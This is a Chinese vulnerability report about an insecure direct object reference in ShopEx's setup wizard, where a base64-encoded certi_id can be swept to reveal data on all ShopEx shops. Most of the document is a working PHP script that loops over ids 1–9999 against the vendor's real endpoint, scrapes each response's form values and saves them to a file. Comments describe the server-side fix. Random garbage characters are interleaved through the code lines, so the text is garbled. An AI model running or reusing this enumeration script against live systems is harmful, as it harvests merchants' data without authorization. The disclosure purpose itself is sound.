简要描述:
ShopEx 某接口缺陷，可遍历所有网站
详细说明:
问题出现在 ShopEx 网店使用向导页面。
http://guide.ecos.shopex.cn/step ... WlkaWFuLmNvbVwvIn0=
refer 参数 base64 解密为 {"certi_id":'1051',"callback_url":"http:\/\/www.joyogame.net\/"}
我们修改 certi_id 即可遍历所有使用了 ShopEx 程序的网站。这说明服务端并未校验请求中的 certi_id 是否属于当前用户，而是直接信任客户端提交的标识（典型的不安全直接对象引用，IDOR）。
. |9 w: q& A- f' R* l% h2 L<?php: ?) j3 i0 T9 N
/*
 * Proof-of-concept driver from the report: walks certi_id values 1..9999 and
 * calls ShowshopExD() once per value. Every iteration is one request to the
 * vendor's setup-wizard endpoint carrying a client-chosen certi_id, which is
 * also the pattern a defender would look for in server logs: a sequential id
 * sweep against step2.php from a single client.
 */
* p- z# Y0 }& q' e for ($i=1; $i < 10000; $i++) { // sweep certi_id values
$ H4 p" R5 ]3 x% Q" Q- [, Y3 x
ShowshopExD($i);
- ~ a4 P- r0 V( Y5 g
+ B, Q' T& c/ n' n. c }- O; R" x* Q2 [! L! C$ W+ @
3 i g3 ?) U, ~$ k! R* F
/**
 * Requests the ShopEx setup-wizard page step2.php for one certi_id and dumps
 * the name/value pairs of the text inputs found in the response.
 *
 * The only thing that selects whose data comes back is the certi_id placed in
 * the base64-encoded JSON "refer" parameter built below. Per the report, the
 * server accepts that client-supplied identifier without checking that the
 * caller is entitled to it -- an insecure direct object reference. The fix
 * belongs on the server side (tie certi_id to the authenticated session or a
 * server-signed token and authorize the lookup); merely changing how "refer"
 * is encoded does not remove the flaw.
 *
 * @param int $cid certi_id to request; coerced with intval() before use.
 * @return void  Results are echoed to stdout and appended to c:/shopEx.txt.
 */
function ShowshopExD($cid) {
! A. V, S, `1 s; ^( m# w+ t) S, m- S, U9 Y5 l9 \! e
$url='http://guide.ecos.shopex.cn/step2.php';
+ N# w/ I* J ]; W& q* [! T8 Q" {: Z. Z% h1 z, K8 x( @% y
// Client-built "refer": base64 of a JSON object whose certi_id is the swept
// value. Nothing in it is signed or bound to a session, so base64 here is
// encoding, not protection.
$refer = base64_encode('{"certi_id":'.intval($cid).',"callback_url":"http:\/\/www.a.com\/"}');9 _" U3 C/ I% w: R
9 i' a9 M P; |/ I! |! U9 l
$url = $url.'?refer='.$refer;
* f- ~2 @5 \. ^/ o/ w* M L5 j" u) Z2 ]8 K7 D7 j0 u$ G+ J' n Z
$ch = curl_init($url);
' {8 @" l% K9 T5 M6 P* y! L$ D! m) Z4 ]7 x& S* o
// Return the body as a string instead of printing it.
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true) ;
. B9 Q6 O1 U# E5 [ L& j- B; l- Q1 r7 U8 Z, y* ~
curl_setopt($ch, CURLOPT_BINARYTRANSFER, true) ;" H& R+ N b/ V) c: {
0 \- z8 Z$ h$ `
$result = curl_exec($ch);
& ]1 v* _, l" {+ V! V: y, s7 k, J5 R$ e# n: {' h2 {) W
// Presumably re-encoded for display on a GB2312 (Chinese Windows) console.
$result = mb_convert_encoding($result, "gb2312", "UTF-8");1 Q$ C7 `; a( r( {$ V5 ~& m
/ B9 b: }5 L5 J$ r, S: E6 y
// Success heuristic: treats the id as resolved when the page contains the
// refer value -- presumably the wizard echoes it back; not verified here.
if(strpos($result,$refer))
- Q) ?- X2 R' Q' X3 n# ?+ M* S
3 D a2 b; Z9 O/ y {$ J: T Y5 q/ w- n/ @
7 ^- N( V# ^! f' o" Z v0 R
$fp = fopen("c:/shopEx.txt",'ab'); // append results to a local file
- u% y6 L5 C, q, u$ X1 E) X/ @
// Collect every <input type="text" .../> tag; name/value pairs come next.
preg_match_all('/<input\stype="text"(.*?)\/>/',$result,$value);0 `2 ]& i' Q( z4 ]0 k9 ?
! a+ ~1 ~# L* d3 n2 F- s. ~
foreach ($value[1] as $key) {
6 _% H) m5 s1 g3 H$ D: s
" R; }3 Q/ I5 W l8 @" Q- A! m preg_match_all('/name="(.*?)"(.*?)value="(.*?)"/',trim($key),$res);
' w8 R4 O2 r. r( p/ s ~3 A9 \
: W$ ?% l4 O3 D( N echo $res[1][0].':'.$res[3][0]."\r\n";
9 l& n2 d+ L4 D. f) L1 Y* w$ v1 o# Y
$col =$res[1][0].':'.$res[3][0]."\r\n";
, |; }3 c# P- n( A& w# p! b. a+ [# p! f/ M. V* f8 E$ f! q
fwrite($fp, $col, strlen($col)); u7 l4 ^ c" h6 }$ M8 [
- e! e% ^9 h9 }9 V }
* `$ M$ w, n) S; ]8 Y+ k; e! \ W/ C% Q l
echo '--------------------------------'."\r\n";1 s! s4 K8 b; d+ o3 c* \6 V
( K9 i" Y3 ~& e% F
fclose($fp);
) L5 G; p! E4 Y8 @: r3 }! w( f+ ~* w1 F' }. w4 C2 [
}
6 O- [# K% h; [; U* e, ^: y7 e1 [# V) ^- `/ \- m$ o, y
flush();
3 p5 j* t8 M- b3 [6 p! y. A1 n3 p* o0 m1 {6 a V( I
curl_close($ch);. c8 Y; k; C! j x2 R5 G4 }
4 W# j6 y' s0 `3 q } C' d1 N! w- b" @" P: v
" U6 e" v" z. i# X8 U5 i?>
漏洞证明:
http://www.myhack58.com/Article/UploadPic/2013-9/201392110502740490.jpg
refer 换成其他加密方式。（仅更换编码或加密方式并不能消除该问题：服务端还需校验请求中的 certi_id 是否属于当前已认证的用户或会话，否则标识仍可被遍历。）